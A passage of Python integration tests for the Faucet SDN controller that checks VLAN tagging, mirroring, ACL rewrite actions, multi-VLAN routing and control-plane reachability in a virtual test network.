native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.flap_all_switch_ports()
# Add mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', self.port_map['port_1'],
restart=True, cold_start=False)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
# Remove mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', [],
restart=True, cold_start=False)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
output_only: True
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
ping_pairs = (
(first_host, second_host),
(second_host, first_host))
self.flap_all_switch_ports()
self.change_port_config(
self.port_map['port_3'], 'mirror',
[self.port_map['port_1'], self.port_map['port_2']],
restart=True, cold_start=False, hup=True)
self.verify_ping_mirrored_multi(
ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
mirror: %(port_1)d
%(port_4)d:
mirror: %(port_1)d
"""
def test_untagged(self):
self.flap_all_switch_ports()
# Make sure the two hosts both mirror from port 1
first_host, second_host = self.hosts_name_ordered()[0:2]
mirror_host = self.hosts_name_ordered()[2]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
mirror_host = self.hosts_name_ordered()[3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = CONFIG_TAGGED_BOILER
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=4, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_tagged(self):
# Untagged traffic specifically dropped.
for host in self.hosts_name_ordered():
host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
for port in self.port_map.values():
self.wait_nonzero_packet_count_flow(
{'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
def test_tagged(self):
for host in self.hosts_name_ordered():
scapy_txt = host.cmd(
('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
super().test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
# port 3 will mirror port 1
mirror: %(port_1)d
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.flap_all_switch_ports()
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
tagged_ports = (self.port_map['port_1'], self.port_map['port_2'], self.port_map['port_4'])
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
self.change_port_config(
self.port_map['port_3'], 'mirror', None,
restart=True, cold_start=False)
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
- set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for down host.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
# next host routes via FAUCET for other host in same connected subnet
# to cause routing to be exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
self.verify_drop_rules(required_ipds, ipd_to_macvlan)
self.verify_routing_performance(first_host, second_host)
self.verify_l3_mesh(first_host, second_host)
self.verify_l3_hairpin(first_host)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
IPV = 6
NETPREFIX = 112
ETH_TYPE = IPV6_ETH
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 103))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
def netbase(self, vid, host):
return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))
def fib_table(self):
return self._IPV6_FIB_TABLE
def fping(self, macvlan_int, ipg):
return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv6_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
VIDS = _vids()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
(' %u:',
' description: "tagged"')) % i for i in VIDS])
CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
'%(port_2)d', ','.join(STR_VIDS),
'%(port_3)d', ','.join(STR_VIDS),
'%(port_4)d', ','.join(STR_VIDS))
def test_tagged(self):
self.ping_all_when_learned()
for host in self.hosts_name_ordered():
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
setup_commands.extend([
'ip link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid),
'ip link set dev %s up' % vlan_int])
self.quiet_commands(host, setup_commands)
for host in self.hosts_name_ordered():
rdisc6_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
rdisc6_commands.append(
'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
self.quiet_commands(host, rdisc6_commands)
for vlan in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
for _ in range(3):
for host in self.hosts_name_ordered():
self.quiet_commands(
host,
['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
vlan_hosts_learned = self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': str(vlan)})
if vlan_hosts_learned == len(self.hosts_name_ordered()):
break
time.sleep(1)
self.assertGreater(
vlan_hosts_learned, 1,
msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
def test_tagged(self):
super().test_tagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
self.verify_broadcast((ext_port1, ext_port2), False)
self.verify_broadcast((int_port1, int_port2), True)
self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""
def test_tagged(self):
self.ping_all_when_learned()
native_ips = [
ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
for native_ip in native_ips:
if native_ip != own_native_ip:
self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the swapped VLAN VID
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
